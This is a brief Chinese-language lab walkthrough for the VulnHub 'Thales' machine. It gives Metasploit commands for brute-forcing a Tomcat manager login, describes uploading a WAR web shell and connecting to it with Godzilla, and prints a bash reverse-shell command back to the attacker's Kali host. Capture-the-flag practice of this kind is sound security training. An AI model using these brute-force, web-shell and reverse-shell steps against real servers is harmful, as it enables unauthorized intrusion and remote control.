1.下载好该靶机,将桥接模式改为NET网段并启动
https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP
arp-scan -l
nmap -O 192.168.56.101
3.访问改IP 192.168.56.101

4.点击manager app发现有个登录
使用msf爆破一下
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell
在kali进行监听

在终端运行
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到
